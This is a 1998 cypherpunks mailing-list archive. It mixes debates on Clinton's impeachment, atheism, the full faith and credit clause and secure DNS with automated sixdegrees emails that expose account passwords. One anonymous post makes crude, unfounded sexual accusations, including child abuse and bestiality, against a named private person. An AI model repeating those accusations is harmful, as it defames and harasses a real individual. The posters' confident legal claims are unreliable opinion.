during the Nixon investigations

--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 14:12:25 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... (fwd)
Message-ID: <199809161937.OAA08809@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 16 Sep 1998 12:02:22 -0700
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Democracy...

> All right Mr. Logic, you're so sharp, give me ONE example of a *moral*
> absolute.

Morality and the distinctions that can be drawn from it are a consequence of
the individual and the characteristics of their milieu and their species.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 16 Sep 1998 19:54:58 +0800
To: Matthew James Gering <mgering@ecosystems.net>
Subject: RE: It's finally over (was Re: Explanation of Harald Fragner and  cypherpunks)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284687@mossbay.chaffeyhomes.com>
Message-ID: <199809170055.UAA28232@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <33CCFE438B9DD01192E800A024C84A19284687@mossbay.chaffeyhomes.com>, on
09/16/98 
   at 12:37 PM, Matthew James Gering <mgering@ecosystems.net> said:

>What we really need is an automated system that could authorize/deny an
>address prior to the code/password being sent that would keep track of
>distribution list addresses and such.

>Perhaps I'll create one myself soon.

PGP, Digital signatures, CA's, Authentication, ... This *is* a crypto
related group isn't it?

How does Thwart, Verisign, or the other CA's handle authentication of an
e-mail address in there low level certs?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  Homey don't play that!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNgAY+49Co1n+aLhhAQGPqgP7BKyRdt9xZhk6jWVoOgHU8RuonrTpj7jh
TLOhzOy/F8UyycDnaIUtVlESmbCvCpkTIMyvEo9opcrUOD7Mm3I0JWAQ+nNPSN9T
8lQ45PEyjyYf9jhCySCpvzfan8vGQBFY0eGNFobcp4an7SKxJG1Yib5QRppkfghN
nhd4Wz1GRQA=
=l6Cf
-----END PGP SIGNATURE-----
 
Tag-O-Matic: I use OS/2 2.0 and I don't care who knows!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 17:09:19 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284693@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Try pantheism. If one fundamentaly believes that god does not 
> exist, which clearly involves faith, then yes it is a religion.

Then I guess you could say that pantheism is an atheist religion, as
opposed to a theist religion.

My nice definition of atheism is reason over faith, science over
mysticism, basically an anti-religion. While that may be etymologically
unjustified, it does accurately reflect the views of the majority of
people I know who call themselves atheist, myself included.

Notice my brackets:

a- (without) + [theos (god) + ismos (practice or doctrine)]

not

[a- (without) + theos (god)] + ismos (practice or doctrine)

> By your view an agnostic can't be religion

No, and it's not, it's like standing in the doorway of a religion, not
sure whether to enter or leave, perhaps practicing but not believing.
Such indecisiveness annoys me, but it accounts for the majority of the
population.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 16 Sep 1998 17:07:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Would Congress have been affected by the CDA?
In-Reply-To: <v03130302b225bb692515@[209.66.100.50]>
Message-ID: <360036D8.470B@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> Don't forget that throughout history bluenoses and puritans have gotten off
> on holding up examples of thoughtcrime.
> 
I suppose that allows them to enjoy the material under the guise of
saving the rest of us from it. Or maybe, just maybe, they want to punish
somebody because they are unable to partake of the feast without feeling
guilt strong enough to cause sphincter lockup.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@ofb.net
Date: Wed, 16 Sep 1998 17:26:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Democracy...
In-Reply-To: <36002351.339B@pro-ns.net>
Message-ID: <19980916222736.1665.qmail@ofb.net>
MIME-Version: 1.0
Content-Type: text



> > The congress doesn't pass laws regarding marriages. 
> Yet.
Not really true, IMO.  Consider

http://thomas.loc.gov/cgi-bin/bdquery/z?d104:HR03396:@@@L

Signed into law in 1996, The Defense of Marriage Act, seeks to define 
"marriage" as a marriage between one man and one woman, in an attempt to 
prevent gay people from getting, say, married in Hawaii and then getting 
the same protection as other married people.

Unfortunately, it it seems to be in character with the "full faith and 
credit" clause (Article IV, Section 1) of the U.S. Constitution, which 
follows "And the Congress may by general Laws prescribe the 
Manner in which such Acts, Records and Proceedings shall be proved,
and the Effect thereof."

The same rationale could be used in turning state-issued driver's 
licenses into National ID Cards, couldn't it?

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zebo <zebo@pro-ns.net>
Date: Wed, 16 Sep 1998 15:39:07 +0800
To: Matt Elliott <melliott@ncsa.uiuc.edu>
Subject: Re: Democracy...
In-Reply-To: <v04020504b225b82b6978@[141.142.103.240]>
Message-ID: <36002351.339B@pro-ns.net>
MIME-Version: 1.0
Content-Type: text/plain



Matt Elliott wrote:

> The congress doesn't pass laws regarding marriages. 

Yet.

Z




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<78hd50g0@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 14:54:26 +0800
To: "Jolly CyberSnot"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809161946.MAA25881@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Jolly CyberSnot
sixdegrees Password: fishmelt

In response to your request for a new sixdegrees(tm) password, 
we have sent you the following temporary password: fishmelt. 

As soon as you come to the site, http://www.sixdegrees.com , and use 
it to log-in on the home page, it will become your official 
password, and your old password will be deactivated. 

(If you end up remembering your old password and use that to 
log-in at the site before using this new temporary password, 
the temporary password will be deactivated.)

This may seem wacky, but it's for your security. And, either 
way, once you successfully log-in at the site, you can go to 
your personal profile and choose whatever password you like - 
in fact, we encourage you to do so.

If you never requested a new password and got this message in 
error, just continue using your old password and e-mail us at 
issues@sixdegrees.com. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================




E.SI.REQPW.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 16 Sep 1998 15:02:08 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Democracy...
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928467E@mossbay.chaffeyhomes.com>
Message-ID: <v04011709b225c5be20b4@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:47 PM -0400 on 9/16/98, Matt Elliott wrote:


> The congress doesn't pass laws regarding marriages.  That is all up to
> individual states.

Nit: But, not in Utah, of course. :-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<5hmd50a5@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 15:38:22 +0800
To: "Schlomo CyberPoopy"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809162032.NAA26383@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Schlomo CyberPoopy
sixdegrees password: linkcusp

Congratulations Schlomo. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: linkcusp. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Wed, 16 Sep 1998 11:41:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980916164728.9462.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> 
> > Declan McCullagh <declan@well.com> wrote:
> > lying under oath is perjury, whether you like it or not.
> 
> As rare as it is, I agree with Declan here. If Clinton would lie under oath
> about a non-crime (ie sex between consenting adults) what would he do if
> faced with a real issue?
> 
> He should have said "Yeah, I had sex with her. What business is it of
> yours?".
> 

Presumably he should lie to protect the state. So lieing per se isn't the problem.
It is the use of the privilege where it doesn't apply that upsets you. Murky water
for impeachment, methinks.

Furthermore, we have gone from the CDA to government publication of pornography in
short order. Farbeit for any cypherpunk to complain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 16 Sep 1998 11:54:17 +0800
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Clinton still doesnt get it
In-Reply-To: <Pine.SOL.3.96.980916004143.25010H-100000@cavern.uark.edu>
Message-ID: <Pine.BSF.3.96.980916160832.367D-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 16 Sep 1998, Mac Norton wrote:

>
>On Tue, 15 Sep 1998, attila wrote:
>
> >  25 years of Clinton's raging psychopathic, oversexed behavior:
> >  Hillary has been a willing partner.
> >
> >  nothing but control freaques and obscene power trippers. there
> >  is only amorality in that house --and power by any means.

>
>  snip
>
> One of you had the good sense to
> post the column i repost below, because that fellow seems to
> have gotten a pretty good handle on this squalid mess.  
>
  
  the American public was informed, and snowed under by the Clintons
  together on TV; unfortunately, the stories very true.  and, it 
  should have been abundantly clear that Hillary, and her far left 
  agenda, was driving the car.
  
  I "like" Clinton for one thing only: he _is_ a made for TV
  President who _could_ project an image to the world which would
  make Americans proud to be Americans.  unfortunately, he never
  graduated from the sandbox" "...it's mine... it's all mine...."
  
  I will grudgingly give Bill credit for accepting the clarion call 
  for him to reign in Hillary, after the health care package she
  shepherded by fascist means, and the largest tax increase in 
  some time; to be a Centrist --too bad it took Newt Gingrich and
  friends to deliver the message.
  
  however, my premise, which you did not include underneath the 
  said by (in fact, the mail [mis]quoting potential places some of
  our more vociferous philosopher kings in jeopardy), is that for
  whatever reason, Clinton was born without, or destroyed enroute,
  any sense of morality --Bill is, and has been, the man who must
  honestly believe he has the right to play the game without rules.
  
  Hillary is unquestionably obsessed not only with power, but 
  revenge for her enemies.  
  
  well, the process goes on; Starr is back to working on White-
  watergate, Fostergate, Travelgate, FBIgate, and a few more 
  "?-gates" --the primary focus probably on Hillary.
  
  and, as much as I think the two of them are scurrilous pests 
  which should be dealt with by Terminix, I don't like the process;
  does America have any pride? not much, and hanging Hillary or 
  Bill will leave America just that much poorer.
  

> But punks . . . well, punks . . . a few years ago when I first
> subscribed to this list, to lurk and learn, as I still mostly
> do, there were some hardasses you could depend on to come out
> of the woodwork when things got way out of space, and they'd 
> say: Punks write code. 
>
> And they were write.
> MacN
>
  correct; and I was one complainer, and part of the group which 
  started coderpunks.   but, cypherpunks, and the arguments and 
  discourses, is an excellent diversion --with the exception of the 
  often one-sided "arbitration and adjudication" of opinion.

  anyone who can follow the threads of cypherpunks continuously
  has too much time on their hands; I can only afford the luxury
  of the occasional hit and run.

	attila out...

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 10:16:27 +0800
To: christopher.barkley@srcm.com
Subject: Re: Christopher Barkley
Message-ID: <199809161509.RAA07787@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh, yes another guy to give it up so easily!  Now look, why is it that you
let these people tease me with Monica Lewinsky and kiddie porn, and
then take them away from me just as quickly?!  WHAT THE HELL KIND
OF SERVICE ARE YOU RUNNING?!?!??!  Don't you like kiddie porn?
Don't you want to have sex with Monica, just like the prez?

And you tell that cactus humper Christopher "I like little boys" Barkley
to watch his caboose!  The FBI are going to be after him like cheese
on a stick when they find out that Mr. I Have Lotion In My Pants goes
in for children-with-llamas bestiality like he does.  What a maroon!

Joe C.


At 08:54 PM 9/15/98 -0500, sixdegrees wrote:
>Just a quick update from sixdegrees(tm). Unfortunately Christopher 
>Barkley (barkley@cirr.com) asked not to be listed as your 
>contact with sixdegrees.
>
>The good news is that since you have other confirmed contacts, 
>you'll still be able to have a productive sixdegrees experience. 
>But, if you want to continue to increase your networking power, 
>you may want to head over to http://www.sixdegrees.com , log-in 
>and go to MY CONTACTS and list additional contacts. 
>
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you have any problems, questions or requests send an e-mail to 
>issues@sixdegrees.com and someone will get back to you as soon as 
>possible.
>====================================================================
>
>
>
>
>E.DB.BRESP.2
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 10:21:03 +0800
To: cypherpunks@toad.com
Subject: Re: Harald Fragner
Message-ID: <199809161517.RAA08343@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think Harald Fragner has to take you off the list.  Talk to him about
it.

Hope this helps!


At 09:14 PM 9/15/98 -0400, John Scott Porterfield wrote:
>How do I get off this list!!!  
>
>Bob
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 16 Sep 1998 16:36:42 +0800
To: zebo <zebo@pro-ns.net>
Subject: Re: Democracy...
In-Reply-To: <v04020504b225b82b6978@[141.142.103.240]>
Message-ID: <36002E61.C2427AFA@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



zebo wrote:
> 
> Matt Elliott wrote:
> 
> > The congress doesn't pass laws regarding marriages.
> 
> Yet.
> 
> Z

Yes, that's the IRS's job. :^)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 17:13:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Democracy... (fwd)
Message-ID: <199809162238.RAA09965@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Democracy... (fwd)
> Date: Wed, 16 Sep 1998 15:07:37 -0700

> > Try pantheism. If one fundamentaly believes that god does not 
> > exist, which clearly involves faith, then yes it is a religion.
> 
> Then I guess you could say that pantheism is an atheist religion, as
> opposed to a theist religion.

You could, but you'd be wrong.

> My nice definition of atheism is reason over faith, science over
> mysticism, basically an anti-religion. While that may be etymologically
> unjustified, it does accurately reflect the views of the majority of
> people I know who call themselves atheist, myself included.

Atheism means that one believes that there is no God.

> > By your view an agnostic can't be religion
> 
> No, and it's not, it's like standing in the doorway of a religion, not
> sure whether to enter or leave, perhaps practicing but not believing.

Ah, so there are personal beliefs that aren't religion and then there are
personal beliefs that are? What a self-rightous, pretentious, egotistical
viewpoint.

Your view is *exactly* why the 1st was put in there.

> Such indecisiveness annoys me, but it accounts for the majority of the
> population.

Actualy not, the vast majority of people believe in God, just not your
particular brand - which after all is what the 1st is all about.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Wed, 16 Sep 1998 13:04:45 +0800
To: cypherpunks@toad.com
Subject: sixdegreees spam
Message-ID: <19980916180002.7081.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Has any cypherpunk not noticed that all sixdegrees participants have twodegreees (TM)
of separation via the sixdegrees site????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 20:04:12 +0800
To: "'William H. Geiger III'" <cypherpunks@cyberpass.net>
Subject: RE: It's finally over (was Re: Explanation of Harald Fragner and  cypherpunks)
Message-ID: <33CCFE438B9DD01192E800A024C84A1928469C@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Yes, but you can't expect the masses sign all their email, not yet
anyway, so 
you cannot require cryptographic authentication for mailing lists and 
services subscriptions (esp. for-profit services that would not like to
turn 
away anyone).

That is what you are talking about isn't it?

	Matt

> -----Original Message-----
> From: William H. Geiger III [mailto:whgiii@invweb.net]

> >What we really need is an automated system that could 
> >authorize/deny an address prior to the code/password 
> >being sent that would keep track of distribution list 
> >addresses and such.
> 
> >Perhaps I'll create one myself soon.
> 
> PGP, Digital signatures, CA's, Authentication, ... This *is* a crypto
> related group isn't it?
> 
> How does Thwart, Verisign, or the other CA's handle 
> authentication of an e-mail address in there low level cert

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNgBgOxU5HlNX4dnFEQKQSACghI+z9TK3uXdAbUQMfX2e+ksuk38An3s9
aV7TVzna/+S+cxFXrOmzoxOW
=n91J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 17:44:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... (fwd)
Message-ID: <199809162310.SAA10167@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: silly@ofb.net
> Subject: Re: Democracy...
> Date: Wed, 16 Sep 1998 15:27:36 -0700 (PDT)

> > > The congress doesn't pass laws regarding marriages. 
> > Yet.
> Not really true, IMO.  Consider
> 
> http://thomas.loc.gov/cgi-bin/bdquery/z?d104:HR03396:@@@L
> 
> Signed into law in 1996, The Defense of Marriage Act, seeks to define 
> "marriage" as a marriage between one man and one woman, in an attempt to 
> prevent gay people from getting, say, married in Hawaii and then getting 
> the same protection as other married people.
> 
> Unfortunately, it it seems to be in character with the "full faith and 
> credit" clause (Article IV, Section 1) of the U.S. Constitution, which 
> follows "And the Congress may by general Laws prescribe the 
> Manner in which such Acts, Records and Proceedings shall be proved,
> and the Effect thereof."
> 
> The same rationale could be used in turning state-issued driver's 
> licenses into National ID Cards, couldn't it?


Section 1.  Full Faith and Credit shall be given in each State to the 
public Acts, Records, and judicial Proceedings of every other State. And 
the Congress may by general Laws prescribe the Manner in which such Acts, 
Records and Proceedings shall be proved, and the Effect thereof. 

 --------------------------------------------------------------------------

The interpetation you offer is bogus. The article says Congress shall pass
what laws are deemed necessary to guarantee that the rights and priviliges
of one state are enjoyed in the others. It does *NOT* say they have a right
to define *what those privileges actualy are*. It has one other effect in
that it prohibits safe haven states. Though it would seem to imply that once
a person changed residence from one state to another and obtained
citizenship in the new state some extradition could be refused...

Example:

Bob is living in Texas and growing pot, it is illegal. In Louisana on the
other hand personal possession is allowed for quantities up to 500 lbs. Bob
decides that he would rather live in Louisiana. Until Bob actualy obtained
Louisiana citizenship he would still be considered a Texas resident and
therefore responsible to the laws of that state. So if Texas were to
extradite prior to Louisiana citizenship Bob would have to be extradited.
However, once Bob became a Louisiana citizen and no longer a Texas citizen
his prior actions wouldn't be extraditable. A sort of get out of jail free
card.

At no point is Congress given the authority to define state law, only that
it must guarantee a representative form of government in each state - not
that they all have to be identical. The 10th would prevent such an extension
of authority.

The reality is the actual law could be incredibly simple:

Every state shall respect and protect the rights and priviliges of any
citizen of another state who is resident within the boundaries of the state.
The state shall further protect those rights even if they are in direct
conflict with the laws of that state.

So if a Texas DPS officer pulled over a car from Louisiana he couldn't
hassle them in regards to the pot they had in the car. Even though it was
illegal for Texas citizens.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 16 Sep 1998 17:28:13 +0800
To: Lars Weitze <chromedemon@netcologne.de>
Subject: Re: Encrypting files.
In-Reply-To: <003d01bde1a3$c848e060$7b0000c8@chrome>
Message-ID: <360037C7.341AD349@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Lars Weitze wrote:
> 
> Does anyone now a program for WindozeNT to store encrypted data on harddisk.
> At the moment i use
> ZIP-Files with a Password on them (I now it is not very secure).
> I am living outside USA and do not want any software with backdoors
> ,"masterkeys" or stuff like that.

http://www.pcdynamics.com/SafeHouse/

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 17:55:17 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... - an extension of speculation
Message-ID: <199809162318.SAA10229@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

[related stuff deleted]

> Every state shall respect and protect the rights and priviliges of any
> citizen of another state who is resident within the boundaries of the state.
> The state shall further protect those rights even if they are in direct
> conflict with the laws of that state.
> 
> So if a Texas DPS officer pulled over a car from Louisiana he couldn't
> hassle them in regards to the pot they had in the car. Even though it was
> illegal for Texas citizens.

One way that Texas could address this issue is that the instant somebody
enters the state of Texas they are instant citizens. The downside is that
they could then vote. This leads to the potential of having persons
spin-loop through states gaining citizenship and voting. So Texas would
probably require 30 days or such, retaining the original intent of the
Constitution and the Amendments.

The founding fathers were strong believes in voting with ones feet in
regards discussion and expression of personal beliefs. The United States are
supposed to be a haven for personal freedom.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 20:45:40 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A192846A1@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> So if a Texas DPS officer pulled over a car from Louisiana he couldn't
> hassle them in regards to the pot they had in the car. Even 
> though it was illegal for Texas citizens.

Wow, you learn something new every day. I had always thought state laws
applied to anyone in the states borders, not solely to those people
declared citizens of that state.

In fact if this were the case, why then would it be necessary for the
recently bill/proposal allowing people with a valid concealed weapons
permit in the jurisdiction in which they work to carry that home
(different jurisdiction). In fact wouldn't he need a permit in his home
jurisdiction and NOT his work jurisdiction? How could he get a concealed
weapons permit in his work jurisdiction if the laws can't apply to him?

Surely there is something amiss.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 11:58:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton still doesnt get it
In-Reply-To: <Pine.SOL.3.96.980916004143.25010H-100000@cavern.uark.edu>
Message-ID: <199809161658.SAA15778@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Mac Norton writes:
> Well, I've been working for a couple of days and spent the weekend before
> that with The Report. I read all of it, including the footnotes, every
> damn one of them, and they're where all the good stuff is, btw.  Given
> that weekend study, it's apparent to me, after reviewing several days
> of posts on this topic on this list, that most of you people can't
> or don't read or have the attention spans of gnats.  
> 
> The perjury case has some serious reasonable doubt problems, the
> abuse of power case is thin, thin, and the executive privilege 
> stuff is there as sheer trade goods to give Congress something
> to throw out.  In legal parlance, it wouldn't pass Rule 11.
> And I don't know who is giving you legal advice, but there's
> no sexual harrassment count in the thing.  Read it, if you can.
> Peferably after your medication.

Mac,
Rather than merely writing to say what bozos all the list members
are (unfairly stereotyping us all - even those not from AOL :-),
why don't you give us the benefit of a little of your expertise?
Why do you believe the perjury case has `reasonable doubt' problems?
{Were I on a jury and if convinced that matters are as Starr
presents them, I would have no problem deciding that Clinton lied
in the deposition at least, where the term `sexual relations' seems
to have been carefully and explicitly defined - even assuming that
he /shouldn't/ be convicted on what seems a clear intent to deceive
the court and later the grand jury on multiple points.}

And the abuse of power case seems thin even to a non-lawyer.  But
where does the `executive privilege stuff' come in?  I don't see
that Starr listed that among his possible grounds for impeachment.

And what about obstruction of justice?  Do you see any merit to those
charges?

Inquiring minds want to know.

 - Frondeur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 17 Sep 1998 00:04:10 +0800
To: cypherpunks@cyberpass.net
Subject: DARPA Hires NetAss/TIS TO Develop Secure DNS
In-Reply-To: <2.2.16.19980827140054.0dd7abc4@mailer.packet.net>
Message-ID: <3.0.5.32.19980916190027.008d4dc0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is somewhat tacky.  SecureDNS exists, and TIS got export approval
a while back to publish a "bones" version, minus encryption routines.
John Gilmore and his lawyer decided that, since it only does authentication,
not message encryption, it should be ok to publish _with_ the crypto
algorithms, and it's been quietly sitting on his web pages.
Recently the Feds sent him a letter saying "Oh, no, we didn't mean
it was OK to publish/export this encryption-based authentication system
just because the law says you can, so stop it"....
Now they're paying for another version.  Are they going to try something
DSS-based instead of RSA, just so you don't need encryption-capable
crypto with it, or is this going to be another scam?
Or is it just different parts of the Feds not talking to each other?

At 08:57 AM 8/28/98 -0400, Robert Hettinga wrote:
>At 1:57 PM -0400 on 8/27/98, Edupage Editors wrote:
>> DARPA LEADS FIGHT AGAINST DOMAIN-NAME HACKERS
>> The Defense Advanced Research Projects Agency (DARPA) has awarded a $1.4
>> million contract to Network Associates to develop a cryptographic
>> authentication system for the Internet's domain-address system.  The new
>> system will enable the Net's routing points to verify the origin of any
>> given Web page, preventing hackers from corrupting Web page caches or
>> rerouting domain traffic altogether.  It will not, however, prevent hackers
>> from breaking into individual Web servers and changing pages.  "That's not
>> part of this particular approach," says the director of Network Associates'
>> TIS Labs.  The company is working with the Internet Software Consortium,
>> which will distribute the security system to Unix vendors when it becomes
>> commercially available.  Beta versions are expected to be ready in about six
>> months, with a final product on the market in about 18 months.  (TechWeb 26
>> Aug 98)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




